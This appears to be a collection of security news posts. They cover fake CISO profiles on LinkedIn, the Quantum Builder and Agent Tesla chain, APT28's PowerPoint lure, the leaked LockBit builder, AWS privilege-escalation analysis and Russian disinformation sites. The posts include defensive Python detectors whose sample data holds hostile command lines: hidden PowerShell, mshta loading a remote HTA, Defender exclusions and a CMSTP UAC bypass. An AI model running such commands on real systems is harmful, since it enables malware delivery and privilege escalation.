Someone has recently created a large number of fake LinkedIn profiles for Chief Information Security Officer (CISO) roles at some of the world’s largest corporations. It’s not clear who’s behind this network of fake CISOs or what their intentions may be. But the fabricated LinkedIn identities are confusing search engine results for CISO roles at major companies, and they are being indexed as gospel by various downstream data-scraping sources.
If one searches LinkedIn for the CISO of the energy giant Chevron, one might find the profile for a Victor Sites, who says he’s from Westerville, Ohio and is a graduate of Texas A&M University.
The LinkedIn profile for Victor Sites, who is most certainly NOT the CISO of Chevron.
Of course, Sites is not the real CISO of Chevron. That role is currently occupied by Christopher Lukas of Danville, Calif. If you were confused at this point, you might ask Google who it thinks is the current Chief Information Security Officer of Chevron. When KrebsOnSecurity did that earlier this morning, the fake CISO profile was the very first search result returned (followed by the LinkedIn profile for the real Chevron CISO).
Helpfully, LinkedIn seems to be able to detect something in common about all these fake CISO profiles, because it suggested I view a number of them in the “People Also Viewed” column seen in the image above. There are two fake CISO profiles suggested there, including one for a Maryann Robles, who claims to be the CISO of another energy giant — ExxonMobil.
Maryann’s profile says she’s from Tupelo, Miss., and includes this detail about how she became a self-described “old-school geek.”
“Since playing Tradewars on my Tandy 1000 with a 300 baud modem in the early ’90s, I’ve had a lifelong passion for technology, which I’ve carried with me as Deputy CISO of the world’s largest health plan,” her profile reads.
However, this description appears to have been lifted from the profile for the real CISO at the Centers for Medicare & Medicaid Services in Baltimore, Md.
Interestingly, Maryann’s LinkedIn profile was accepted as truth by Cybercrime Magazine’s CISO 500 listing, which claims to maintain a list of the current CISOs at America’s largest companies:
The fake CISO for ExxonMobil was indexed in Cybercrime Magazine’s CISO 500.
Rich Mason, the former CISO at Fortune 500 firm Honeywell, began warning his colleagues on LinkedIn about the phony profiles earlier this week.
“It’s interesting the downstream sources that repeat LinkedIn bogus content as truth,” Mason said. “This is dangerous, Apollo.io, Signalhire, and Cybersecurity Ventures.”
Google wasn’t fooled by the phony LinkedIn profile for Jennie Biller, who claims to be CISO at biotechnology giant Biogen (the real Biogen CISO is Russell Koste). But Biller’s profile is worth mentioning because it shows how some of these phony profiles appear to be quite hastily assembled. Case in point: Biller’s name and profile photo suggest she is female, however the “About” description of her accomplishments uses male pronouns. Also, it might help that Jennie only has 18 connections on LinkedIn.
Again, we don’t know much about who or what is behind these profiles, but in August the security firm Mandiant (recently acquired by Google) told Bloomberg that hackers working for the North Korean government have been copying resumes and profiles from leading job listing platforms LinkedIn and Indeed, as part of an elaborate scheme to land jobs at cryptocurrency firms.
None of the profiles listed here responded to requests for comment (or to become a connection).
In a statement provided to KrebsOnSecurity, LinkedIn said its teams were actively working to take these fake accounts down.
“We do have strong human and automated systems in place, and we’re continually improving, as fake account activity becomes more sophisticated,” the statement reads. “In our transparency report we share how our teams plus automated systems are stopping the vast majority of fraudulent activity we detect in our community – around 96% of fake accounts and around 99.1% of spam and scam.”
LinkedIn could take one simple step that would make it far easier for people to make informed decisions about whether to trust a given profile: Add a “created on” date for every profile. Twitter does this, and it’s enormously helpful for filtering out a great deal of noise and unwanted communications.
The former CISO Mason said LinkedIn also could experiment with offering something akin to Twitter’s verified mark to users who chose to validate that they can respond to email at the domain associated with their stated current employer.
“If I saw that a LinkedIn profile had been domain-validated, then my confidence in that profile would go way up,” Mason said, noting that many of the fake profiles had hundreds of followers, including dozens of real CISOs. Maryann’s profile grew by a hundred connections in just the past few days, he said.
“If we have CISOs that are falling for this, what hopes do the masses have?” Mason said.
Mason said LinkedIn also needs a more streamlined process for allowing employers to remove phony employee accounts. He recently tried to get a phony profile removed from LinkedIn for someone who falsely claimed to have worked for his company.
“I shot a note to LinkedIn and said please remove this, and they said, well, we have to contact that person and arbitrate this,” he said. “They gave the guy two weeks and he didn’t respond, so they took it down. But that doesn’t scale, and there needs to be a mechanism where an employer can contact LinkedIn and have these fake profiles taken down in less than two weeks.”
The recently discovered malware builder Quantum Builder is being used by threat actors to deliver the Agent Tesla RAT.
A recently discovered malware builder called Quantum Builder is being used to deliver the Agent Tesla remote access trojan (RAT), Zscaler ThreatLabz researchers warn.
“Quantum Builder (aka “Quantum Lnk Builder”) is used to create malicious shortcut files. It has been linked to the Lazarus Group APT due to shared TTPs and source code overlaps, but we cannot confidently attribute this campaign to any specific threat actor.” reads the report published by Zscaler. “In this campaign, threat actors use Quantum Builder to generate malicious LNK, HTA, and PowerShell payloads which then deliver Agent Tesla on the targeted machines.”
Quantum Builder (aka “Quantum Lnk Builder”) is a tool sold on the dark web that lets its buyers create malicious shortcut (LNK) files. It can also generate malicious HTA, ISO, and PowerShell payloads that are used to drop the next-stage malware.
In the campaign observed by the experts, the threat actors used the builder to generate malicious LNK, HTA, and PowerShell payloads, which are then used to deliver Agent Tesla to the targeted machines.
Experts noticed that this campaign features enhancements and a shift toward LNK (Windows shortcut) files when compared to past attacks.
The attack chain observed by Zscaler starts with a spear-phishing email carrying an LNK file bundled inside a GZIP archive. The messages masquerade as an order confirmation from a Chinese supplier of lump and rock sugar, with the LNK file disguised as a PDF document.
Upon execution of the LNK file, the embedded PowerShell code spawns MSHTA, which then executes an HTA file hosted on a remote server.
The HTA file decrypts a PowerShell loader script, which in turn AES-decrypts and GZIP-decompresses a second PowerShell script and loads it in memory. This second script is the downloader: it fetches and executes the Agent Tesla binary from a remote server. The malware is run with administrative privileges by performing a UAC bypass through CMSTP (the Microsoft Connection Manager Profile Installer, a signed Windows binary that can execute commands from an attacker-supplied INF file without a UAC prompt).
Below are the Key Features of this attack:
- The threat actors are evolving their tactics, incorporating new infection chains that deliver Agent Tesla on target machines through LNK and HTA payloads generated by a builder dubbed “Quantum Builder”.
- Quantum Builder is sold in the cybercrime marketplace and can generate LNK, HTA, and ISO payloads that download and execute the final payload through a multi-staged attack chain.
- The in-memory PowerShell scripts decrypted by the Quantum Builder-generated HTA file perform a User Account Control (UAC) bypass via CMSTP in order to execute the final payload (Agent Tesla) with administrative rights. The same UAC bypass is also used to add Windows Defender exclusions on the endpoint.
- The chain relies on Living Off the Land Binaries (LOLBins) to evade detection and camouflage the malicious activity.
- It incorporates techniques such as decoys, UAC prompts, and in-memory PowerShell to execute the final payload; these techniques are regularly updated by the developers of Quantum Builder.
In a second variant of the infection sequence, the GZIP archive is replaced by a ZIP file, while also adopting further obfuscation strategies to camouflage the malicious activity.
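The chain above (LNK to PowerShell, PowerShell to MSHTA with a remote HTA, then Defender exclusions and a CMSTP UAC bypass) is made of process-creation events that are easy to describe as rules. The following is an added example written for this article, not code from Zscaler or from the Quantum Builder campaign: it runs four such rules over a handful of constructed Sysmon-style events (the field names, paths and command lines are assumptions, not captured telemetry) and includes one benign cmstp.exe execution to show that the UAC-bypass rule keys on the `/ni /s` switches rather than on the binary alone.

```python
"""Detection logic for the Quantum Builder -> Agent Tesla chain described above.

Added example, not Zscaler's or Security Affairs' code. SAMPLE_EVENTS are
constructed to resemble Sysmon Event ID 1 (process creation) records; the
field names, paths and command lines are assumptions, not captured telemetry.
"""
import re

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed telemetry mirroring the chain in the text:
# LNK (explorer) -> powershell.exe -> mshta.exe (remote HTA) -> powershell.exe
# -> Defender exclusions and cmstp.exe UAC bypass.
SAMPLE_EVENTS = [
    {"pid": 101, "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'powershell.exe -w hidden -ep bypass -c "Start-Process mshta https://example.invalid/order.hta"'},
    {"pid": 102, "image": r"C:\Windows\System32\mshta.exe", "parent": PS,
     "cmdline": "mshta.exe https://example.invalid/order.hta"},
    {"pid": 103, "image": PS, "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'powershell.exe -nop -w hidden -c "Add-MpPreference -ExclusionPath C:\Users\Public"'},
    {"pid": 104, "image": r"C:\Windows\System32\cmstp.exe", "parent": PS,
     "cmdline": r"cmstp.exe /ni /s C:\Users\Public\setup.inf"},
    # Benign noise: an admin installing a real connection profile interactively.
    {"pid": 200, "image": r"C:\Windows\System32\cmstp.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"cmstp.exe C:\ProgramData\VPN\corp.inf"},
]


def _name(path):
    """Basename of an image path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def _has_switch(cmdline, switch):
    """True if a standalone /switch appears in the command line (case-insensitive)."""
    return re.search(r"(^|\s)/" + switch + r"(\s|$)", cmdline, re.I) is not None


RULES = {
    # What a double-clicked malicious LNK looks like: explorer spawning hidden PowerShell.
    "hidden_powershell_from_explorer": lambda e: (
        _name(e["image"]) == "powershell.exe"
        and _name(e["parent"]) == "explorer.exe"
        and re.search(r"-w(indowstyle)?\s+hidden", e["cmdline"], re.I) is not None),
    # Stage 2: PowerShell launching mshta against a remote HTA.
    "mshta_remote_hta_from_powershell": lambda e: (
        _name(e["image"]) == "mshta.exe"
        and _name(e["parent"]) == "powershell.exe"
        and re.search(r"https?://", e["cmdline"], re.I) is not None),
    # Stage 3: Defender exclusions added from a script host.
    "defender_exclusion_added": lambda e: (
        _name(e["image"]) == "powershell.exe"
        and re.search(r"Add-MpPreference\s+-Exclusion", e["cmdline"], re.I) is not None),
    # Stage 3: CMSTP UAC bypass (MITRE ATT&CK T1218.003): cmstp.exe /ni /s <inf>.
    "cmstp_uac_bypass": lambda e: (
        _name(e["image"]) == "cmstp.exe"
        and _has_switch(e["cmdline"], "ni")
        and _has_switch(e["cmdline"], "s")),
}


def detect(events):
    """Return (rule_name, pid) pairs for every event matching a rule."""
    return [(name, e["pid"]) for e in events for name, pred in RULES.items() if pred(e)]


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:36s} pid={pid}")
```

Each rule on its own is noisy in a large estate; the value is in the parent/child pairing and in seeing several of them fire on one host within minutes, which is the shape of this chain rather than of any single LOLBin.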
Quantum Builder has witnessed a surge in usage in recent months, with threat actors using it to distribute a variety of malware, such as RedLine Stealer, IcedID, GuLoader, RemcosRAT, and AsyncRAT.
“Threat actors are continuously evolving their tactics and making use of malware builders sold on the cybercrime marketplace. This Agent Tesla campaign is the latest in a string of attacks in which Quantum Builder has been used to create malicious payloads in campaigns against various organizations.” concludes the report. “It incorporates sophisticated techniques to evade detections, and the techniques are updated regularly by the developers.”
(SecurityAffairs – hacking, Agent Tesla)
The post Threat actors use Quantum Builder to deliver Agent Tesla malware appeared first on Security Affairs.
ONLINE DISINFORMATION is one of the defining issues of our time and the influence of fake news has become an acute threat to our society.
Disinformation undermines true journalism and steers the public opinion in highly charged topics such as immigration, climate change, armed conflicts or refugee and health crises. Social media platforms are the battlefield of disinformation.
The war in Ukraine is no exception. This investigation shows how a large disinformation campaign targeting European audiences with pro-Russian propaganda was active on social media for months. What started as an investigation of media clones of the German Der Spiegel, Bild and T-Online turned into a fascinating dive into the multimedia world of disinformation production.
Tracing the infrastructure of a few websites helped us discover dozens of websites spreading Russian propaganda related to the war in Ukraine. The campaign undermined the Ukrainian government, its citizens, and the Western governments supporting Ukraine, and it supported lifting the sanctions against Russia.
Qurium’s infrastructure research not only shows how European infrastructure has been used to host the fake news sites, but also how new domains have been registered to keep the campaign running on the very same physical servers.
Qurium’s investigation is the result of a collaboration with EU DisinfoLab, an independent non-profit organization focused on tackling sophisticated disinformation campaigns targeting the EU. Qurium has focused on the technical aspects of the campaign.
Qurium forensics report:
Under the hood of a Doppelgänger
EU DisinfoLab report:
(SecurityAffairs – hacking, Disinformation)
The post ONLINE DISINFORMATION: Under the hood of a Doppelgänger appeared first on Security Affairs.
The Russia-linked APT28 group is using mouse movement in decoy Microsoft PowerPoint documents to distribute malware.
The Russia-linked APT28 employed a technique relying on mouse movement in decoy Microsoft PowerPoint documents to deploy malware, researchers from Cluster25 reported.
Cluster25 researchers analyzed a lure PowerPoint document used to deliver a variant of the Graphite malware, which is known to be used exclusively by APT28. The attack chain starts when the user opens the document in presentation mode and moves the mouse.
The user action starts the execution of a PowerShell script designed to download and run a dropper from OneDrive.
“The code execution runs a PowerShell script that downloads and executes a dropper from OneDrive. The latter downloads a payload that extracts and injects in itself a new PE (Portable Executable) file, that the analysis showed to be a variant of a malware family known as Graphite, that uses the Microsoft Graph API and OneDrive for C&C communications.” reads the analysis published by Cluster25.
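Because the trigger is a hyperlink action inside the deck rather than a macro, it can be found by unzipping the .pptx and reading the slide XML: a shape carrying an `<a:hlinkMouseOver>` (or `<a:hlinkClick>`) element with `action="ppaction://program"` makes PowerPoint run the external `Target` named in the slide’s relationships part. The scanner below is an added example written for this article, not Cluster25’s code or the analyzed document; it builds a constructed two-slide deck in memory (the command line and the example.invalid host are invented, not taken from the report) and reports every slide that runs a program on mouse-over or click.

```python
"""Find "Run program" actions bound to mouse-over or click in a .pptx.

Added example, not Cluster25's code. A PPTX is a ZIP of XML parts: a shape's
<a:hlinkMouseOver> (or <a:hlinkClick>) with action="ppaction://program" makes
PowerPoint run the external Target named in the slide's .rels part when the
user hovers (or clicks) during a slideshow. The deck built below is constructed
for the example; its command line and example.invalid host are not from the report.
"""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

NS_A = "http://schemas.openxmlformats.org/drawingml/2006/main"
NS_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
NS_PKG = "http://schemas.openxmlformats.org/package/2006/relationships"
PROGRAM_ACTION = "ppaction://program"


def _rels_for(zf, part):
    """rId -> Target for a part, e.g. ppt/slides/slide1.xml -> ppt/slides/_rels/slide1.xml.rels."""
    folder, name = part.rsplit("/", 1)
    rels_part = f"{folder}/_rels/{name}.rels"
    if rels_part not in zf.namelist():
        return {}
    root = ET.fromstring(zf.read(rels_part))
    return {r.get("Id"): r.get("Target") for r in root.iter(f"{{{NS_PKG}}}Relationship")}


def find_program_actions(pptx_bytes):
    """Return one dict per hyperlink action that runs a program, with its resolved target."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(pptx_bytes)) as zf:
        for part in sorted(zf.namelist()):
            if not re.fullmatch(r"ppt/slides/slide\d+\.xml", part):
                continue
            rels = _rels_for(zf, part)
            root = ET.fromstring(zf.read(part))
            for trigger in ("hlinkMouseOver", "hlinkClick"):
                for el in root.iter(f"{{{NS_A}}}{trigger}"):
                    if el.get("action") != PROGRAM_ACTION:
                        continue          # ordinary hyperlinks have no action or a harmless one
                    rid = el.get(f"{{{NS_R}}}id")
                    findings.append({"slide": part, "trigger": trigger,
                                     "target": rels.get(rid, "")})
    return findings


def _slide(hlink_tag, action_attr):
    """Minimal slide XML with one shape carrying the given hyperlink element."""
    return (f'<p:sld xmlns:a="{NS_A}" xmlns:r="{NS_R}" '
            f'xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">'
            f'<p:cSld><p:spTree><p:sp><p:nvSpPr><p:cNvPr id="2" name="Picture 1">'
            f'<a:{hlink_tag} r:id="rId2"{action_attr}/>'
            f'</p:cNvPr></p:nvSpPr></p:sp></p:spTree></p:cSld></p:sld>')


def _rels(target):
    return (f'<Relationships xmlns="{NS_PKG}"><Relationship Id="rId2" '
            f'Type="{NS_R}/hyperlink" Target="{target}" TargetMode="External"/></Relationships>')


def build_sample_pptx():
    """Constructed two-slide deck: slide 1 runs a program on mouse-over, slide 2 is a plain link."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("ppt/slides/slide1.xml",
                    _slide("hlinkMouseOver", f' action="{PROGRAM_ACTION}"'))
        zf.writestr("ppt/slides/_rels/slide1.xml.rels",
                    _rels(r"powershell.exe -w hidden -ep bypass -f C:\Users\Public\stage1.ps1"))
        zf.writestr("ppt/slides/slide2.xml", _slide("hlinkClick", ""))
        zf.writestr("ppt/slides/_rels/slide2.xml.rels",
                    _rels("https://example.invalid/agenda.pdf"))
    return buf.getvalue()


if __name__ == "__main__":
    for f in find_program_actions(build_sample_pptx()):
        print(f"{f['slide']}: {f['trigger']} -> {f['target']}")
```

The same check can be applied to mail-gateway attachments, where a `ppaction://program` action is a strong enough signal on its own to quarantine, since legitimate decks almost never run external programs from a slide.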
The lure document uses a template potentially linked to the Organisation for Economic Co-operation and Development (OECD); it contains two slides, written in English and French respectively, with the same content.
The dropper is delivered as a file with a JPEG extension (DSC0002.jpeg); it is actually a DLL that is later decrypted and written to C:\ProgramData\lmapi2.dll.
The last-stage malware is a version of Graphite; it communicates with its C2 servers through the domain graph[.]Microsoft[.]com (i.e. by abusing the Microsoft Graph service) and OneDrive.
Graphite is fileless malware, deployed in memory only, that threat actors use to deliver post-exploitation frameworks such as Empire.
The analysis of the documents’ metadata revealed that the nation-state actors employed them in a campaign between January and February 2022. However, the researchers noticed that URLs used in the attacks were still active in August and September, which suggests the campaign is still ongoing.
Potential targets of the campaign are organizations and individuals operating in the defense and government sectors of countries in Europe and Eastern Europe.
“Such recent evidence could suggest some sort of activities still ongoing linked to the described threat or to some of its variants. Finally, based on several indicators, geopolitical objectives and the analyzed artifacts, Cluster25 attributes this campaign to the Russia-linked threat actor known as APT28 (aka Fancy Bear, TSAR Team, Pawn Storm, Sednit) and indicates entities and individuals operating in the defense and government sectors of Europe and Eastern Europe countries as potential targets.” concludes the report.
(SecurityAffairs – hacking, APT)
The post APT28 relies on PowerPoint Mouseover to deliver Graphite malware appeared first on Security Affairs.
The recently born Bl00Dy Ransomware gang has started using the recently leaked LockBit ransomware builder in attacks in the wild.
The Bl00Dy Ransomware gang is the first group that started using the recently leaked LockBit ransomware builder in attacks in the wild.
Last week, an alleged disgruntled developer leaked the builder for the latest encryptor of the LockBit ransomware gang.
The latest version of the encryptor, version 3.0, was released by the gang in June. According to the gang, LockBit 3.0 has important novelties such as a bug bounty program, Zcash payment, and new extortion tactics. The gang has been active since at least 2019 and today it is one of the most active ransomware gangs.
The builder was leaked on Twitter by at least two accounts, @ali_qushji and @protonleaks1.
The builder is contained in a password-protected 7z archive, “LockBit3Builder.7z,” containing:
The availability of the builder could allow any threat actor to create its own version of the ransomware customizing it by modifying the configuration file.
BleepingComputer first reported that the Bl00Dy Ransomware group has started using the LockBit 3.0 builder to create its own ransomware.
Earlier this week, the researcher Vladislav Radetskiy reported the discovery of a new Bl00Dy Ransomware Gang encryptor that was employed in an attack on a Ukrainian organization. Researchers did not immediately identify the ransomware involved, which looked like either Conti or LockBit.
MalwareHunterTeam researchers confirmed that the encryptor used in the attack by the Bl00Dy Ransomware group was built using the leaked LockBit 3.0 builder.
BleepingComputer, which tested the Bl00dy Ransomware Gang’s encryptor, also confirmed that it was generated with the leaked LockBit 3.0 builder.
(SecurityAffairs – hacking, Bl00Dy Ransomware)
The post Bl00dy ransomware gang started using leaked LockBit 3.0 builder in attacks appeared first on Security Affairs.
nuvola is the new open-source cloud security tool to address the privilege escalation in cloud environments.
nuvola is the new open source security tool made by the Italian cyber security researcher Edoardo Rosa (@_notdodo_), Security Engineer at Prima Assicurazioni. The tool was released during the RomHack 2022 security conference in Rome. The tool helps the security community to address the complex topic of privilege escalation on cloud environments such as AWS.
Privilege escalation is one common practice used by bad actors to gain entry into your most sensitive systems. They may start with a low-level account, but they exploit permissions and pathways to work themselves up to an intimidating level of privilege where they’re poised to cause irreparable damage and also gain persistence or lockdown the account.
Forrester estimated that 80% of security breaches involve privileged credentials. Many organizations have adopted cloud with such enthusiasm that they’ve failed to cover the fundamentals in security leaving many gaps for bad actors to find their way in.
Just like other forms of attacks, privilege escalation can go unnoticed, especially in a complex cloud environment where companies already have difficulty gaining visibility into their internal users, identities, and actions. A bad actor could spend days, if not weeks, inside your systems and you may not even know it. They could even expose sensitive data and, like in 50% of cases, you might be completely unaware of the breach until a third party informs you of it.
When it comes to AWS security, Identity and Access Management (IAM) permission misconfigurations have long held a spotlight, but that doesn’t mean they’re any easier to avoid. In reality, preventing privilege escalation begins with making it as difficult as possible by applying the principle of least privilege.
Still, with common configuration issues and other vulnerabilities becoming commonplace in AWS architecture, it’s important to understand how bad actors could exploit our environments by understanding the most common AWS privilege escalations used.
Cloud Security Context
Cloud is a continuously evolving space with new services, strategies, and technologies springing up seemingly overnight. Due to this, organizations regularly change and adapt their approach to cloud and cloud security.
A report from the Cloud Security Alliance (Technology and Cloud Security Maturity, 2022) states that 84% of organizations report having no automation; since Identity and Access Management is a key factor in securing companies, automating the detection of possible attack paths may reduce the attack surface and avoid potential data breaches.
Beyond the technological aspects, another compendium of Cloud Security Alliance (The State of Cloud Security Risk, Compliance, and Misconfigurations, 2022) states that the lack of knowledge and expertise are well-known issues within the information security industry.
It is no surprise then, that lack of knowledge and expertise was consistently identified as:
- the primary barrier to general cloud security (59%)
- the primary cause of misconfigurations (62%)
- a barrier to proactively preventing or fixing misconfigurations (59%)
- the primary barrier to implementing auto-remediation (56%)
Also, from the same report, the primary reason organizations state for having a security incident due to misconfigurations is lack of visibility (68%).
A global overview is vital for both an attacker and a defender because it allows both security analysts and attackers to immediately find attack paths to remediate or abuse the system.
A full understanding of the environment from a high-level enables companies to establish priorities and fulfill security requirements.
While IAM security is very important, an attacker may also abuse misconfigurations in the environment such as exposed resources (Alteryx, Twilio) or services; a Cloud Security Posture Management (CSPM) tool can help companies secure their assets by defining standard controls (CIS, PCI, NIST, SOC2) and custom rulesets to avoid false positives or increase the detection of security issues.
While some tools that support AWS are very useful and greatly developed, many of them lack a global overview or features and the results must be manually reviewed, aggregated and ingested in other tools or custom scripts.
nuvola (with the lowercase n) is a tool to dump and perform automatic and manual security analysis on AWS environments configurations and services using predefined, extensible and custom rules created using graphs and a simple Yaml syntax.
The general idea behind this project is to create an abstracted digital twin of a cloud platform. For a more concrete example: nuvola reflects the BloodHound traits used for Active Directory analysis but on cloud environments.
The usage of a graph database also increases the possibility of finding different and innovative attack paths and can be used as an offline, centralized and lightweight digital twin.
Like BloodHound, nuvola uses the advantages and principles of the graph theory (implemented in the Neo4j graph database) to discover, and reveal relationships between objects within a cloud ecosystem enabling the engineers to perform analysis.
Since Prima Assicurazioni believes in open source, the tool was created with a community mindset and without custom or company-specific constraints, to help us and other companies secure their AWS ecosystems. The tool also supports the creation of detection rules as YAML files, so that both experts and non-experts can contribute to the project.
For example, using nuvola we can define a YAML file to find all EC2 instances whose metadata endpoint has not been upgraded to IMDSv2. The syntax is easier than the one offered by Cypher, the query language of Neo4j, allowing even analysts who are not Cypher experts to perform assessments.
Figure. Output of a query to find vulnerable EC2 instances
The main advantage of using graphs is that we are able to find paths: from A to B.
We can find a vulnerable path using a YAML file that queries all paths from all users or roles to a target, in this case the policy called AdministratorAccess, abusing the actions PassRole and CreateStack.
Figure. List of AWS roles which can perform privilege escalation to administrator
The output shown in the above image states that cloudformation-deployer role can reach the policy AdministratorAccess; as well as the role temp-backend-api-role-runner.
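The two rules shown above (instances still accepting IMDSv1, and principals that reach AdministratorAccess through iam:PassRole plus cloudformation:CreateStack) are simple to express once the account is modelled as a graph. The following is an added example written for this article, not nuvola’s code: it uses neither nuvola’s YAML rule format nor Neo4j/Cypher, but builds a small in-memory graph from a constructed account inventory (the account id, user names, policy contents and trust relationships are invented; the role names reuse those from the figure above only as labels) and walks it the way the Cypher query would. The escalation edge is derived the way a real attacker would use it: a principal that may call cloudformation:CreateStack and pass a role that trusts cloudformation.amazonaws.com effectively runs with that role’s policies.

```python
"""Graph-style IAM analysis in the spirit of nuvola, as an added example.

Not nuvola's code: it uses neither its YAML rules nor Neo4j/Cypher. It shows
the two checks the text describes on a small in-memory graph built from a
constructed account inventory (invented names, policies and trust relationships):
EC2 instances whose metadata endpoint still accepts IMDSv1, and principals that
reach AdministratorAccess by chaining iam:PassRole with cloudformation:CreateStack.
"""
from collections import deque
from fnmatch import fnmatchcase

ACCOUNT = "111122223333"   # constructed account id

# Shaped like ec2:DescribeInstances MetadataOptions; 'required' means IMDSv2 only.
INSTANCES = [
    {"id": "i-0aaa", "HttpTokens": "optional"},
    {"id": "i-0bbb", "HttpTokens": "required"},
]

# Allow statements only: (action pattern, resource pattern).
POLICIES = {
    "AdministratorAccess": [("*", "*")],
    "DeployerPolicy": [("cloudformation:CreateStack", "*"),
                       ("iam:PassRole", f"arn:aws:iam::{ACCOUNT}:role/cloudformation-deployer")],
    "ReadOnly": [("s3:GetObject", "*")],
}

# Principals with attached policies; roles also list which services may assume them.
PRINCIPALS = {
    "user/ci-bot": {"policies": ["DeployerPolicy"], "trust": []},
    "role/cloudformation-deployer": {"policies": ["AdministratorAccess"],
                                     "trust": ["cloudformation.amazonaws.com"]},
    "role/temp-backend-api-role-runner": {"policies": ["DeployerPolicy"],
                                          "trust": ["ec2.amazonaws.com"]},
    "user/analyst": {"policies": ["ReadOnly"], "trust": []},
}


def imdsv1_instances(instances=INSTANCES):
    """Rule 1: instances not upgraded to IMDSv2 (HttpTokens must be 'required')."""
    return [i["id"] for i in instances if i.get("HttpTokens") != "required"]


def allowed(principal, action, resource):
    """IAM-style match of one action/resource against the principal's Allow statements."""
    return any(fnmatchcase(action, act) and fnmatchcase(resource, res)
               for pol in PRINCIPALS[principal]["policies"]
               for act, res in POLICIES[pol])


def build_graph():
    """Edges (src, relation, dst). PassRole+CreateStack becomes an explicit edge."""
    edges = [(p, "HAS_POLICY", pol) for p, info in PRINCIPALS.items() for pol in info["policies"]]
    for p in PRINCIPALS:
        for r, rinfo in PRINCIPALS.items():
            if r == p or not r.startswith("role/"):
                continue
            # CloudFormation will run the stack as role r if p may pass r to it.
            if ("cloudformation.amazonaws.com" in rinfo["trust"]
                    and allowed(p, "cloudformation:CreateStack", "*")
                    and allowed(p, "iam:PassRole", f"arn:aws:iam::{ACCOUNT}:{r}")):
                edges.append((p, "PASSROLE_CREATESTACK", r))
    return edges


def paths_to_policy(edges, target="AdministratorAccess"):
    """Rule 2: shortest path from each non-admin principal to the target policy."""
    adj = {}
    for s, rel, d in edges:
        adj.setdefault(s, []).append((rel, d))
    paths = {}
    for start, info in PRINCIPALS.items():
        if target in info["policies"]:
            continue                                # already admin, not an escalation
        queue, seen = deque([(start, [start])]), {start}
        while queue and start not in paths:
            node, path = queue.popleft()
            for rel, nxt in adj.get(node, []):
                if nxt == target:
                    paths[start] = path + [f"-{rel}->", nxt]
                    break
                if nxt in PRINCIPALS and nxt not in seen:
                    seen.add(nxt)
                    queue.append((nxt, path + [f"-{rel}->", nxt]))
    return paths


if __name__ == "__main__":
    print("IMDSv1 still enabled:", imdsv1_instances())
    for who, path in paths_to_policy(build_graph()).items():
        print(who, "=>", " ".join(path))
```

On the constructed data both the CI user and the EC2 runner role reach AdministratorAccess in one hop; the fix is the one the text implies, scoping iam:PassRole to roles that carry only the permissions the stack needs rather than to a role that is itself an administrator.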
About the author: Luca Mella, Cyber Security Expert, Response & Threat Intel | Manager
In 2019, Luca was mentioned as one of the “32 Influential Malware Research Professionals”. He is a former member of the ANeSeC CTF team, one of the firsts Italian cyber war-game teams born back in 2011.
(SecurityAffairs – hacking, cloud computing)
Meta dismantled a network of Facebook and Instagram accounts spreading disinformation across European countries.
Meta announced it has taken down a huge Russian network of Facebook and Instagram accounts used to spread disinformation published on more than 60 websites impersonating news organizations across Europe. The disinformation operation began in May 2022; the network targeted primarily Germany, France, Italy, Ukraine and the UK, spreading fake content related to the war in Ukraine and its impact on Europe. Meta pointed out that this is the largest and most complex Russian operation it has disrupted since the war in Ukraine began.
The shared articles criticized Ukraine and Ukrainian refugees, applauded Russia, and argued that Western sanctions on Russia would backfire.
“We took down a large network that originated in Russia and targeted primarily Germany, and also France, Italy, Ukraine and the United Kingdom. The operation began in May of this year and centered around a sprawling network of over 60 websites carefully impersonating legitimate news organizations in Europe, including Spiegel, The Guardian, Bild and ANSA.” reads the report published by Meta.
“There, they would post original articles that criticized Ukraine and Ukrainian refugees, supported Russia and argued that Western sanctions on Russia would backfire.”
Below is a list of domains used to impersonate legitimate news organizations:
- Avisindependent[.]eu 6/3/2022 France
- bild[.]pics 6/6/2022 Germany
- rrn[.]world 6/6/2022 Multiple
- dailymail[.]top 6/10/2022 UK
- repubblica[.]life 6/13/2022 Italy
- delfi[.]life 6/15/2022 Latvia
- dailymail[.]cam 6/23/2022 UK
- dailymail[.]cfd 6/23/2022 UK
- 20minuts[.]com 6/28/2022 France
- ansa[.]ltd 6/28/2022 Italy
- spiegel[.]ltd 6/29/2022 Germany
- theguardian[.]co[.]com 7/7/2022 UK
Threat actors behind this operation promoted the articles and also original memes and YouTube videos across many internet services, including Facebook, Instagram, Telegram, Twitter, petitions websites Change.org and Avaaz, and even LiveJournal.
“The amplification on social media, on the other hand, relied primarily on crude ads and fake accounts. In fact, on our platforms, the majority of the accounts, Pages and ads were detected and removed by our automated systems before we even began our investigation.” continues the report. “Together, these two approaches worked as an attempted smash-and-grab against the information environment, rather than a serious effort to occupy it long-term.”
Meta shared some numbers related to this campaign:
- Presence on Facebook and Instagram: 1,633 accounts, 703 Pages, one Group and 29 accounts on Instagram.
- Followers: About 4,000 accounts followed one or more of these Pages, less than 10 accounts joined this Group and about 1,500 accounts followed one or more of these Instagram accounts.
- Advertising: Around $105,000 in spending for ads on Facebook and Instagram, paid for primarily in US dollars and euros.
Meta also disrupted for the first time a Chinese network focused on U.S. domestic politics. The Chinese-origin influence operation also targeted the Czech Republic. It ran across Facebook, Instagram, Twitter, and also two petition platforms in Czechia.
(SecurityAffairs – hacking, disinformation)
The post Meta dismantled the largest Russian network since the war in Ukraine began appeared first on Security Affairs.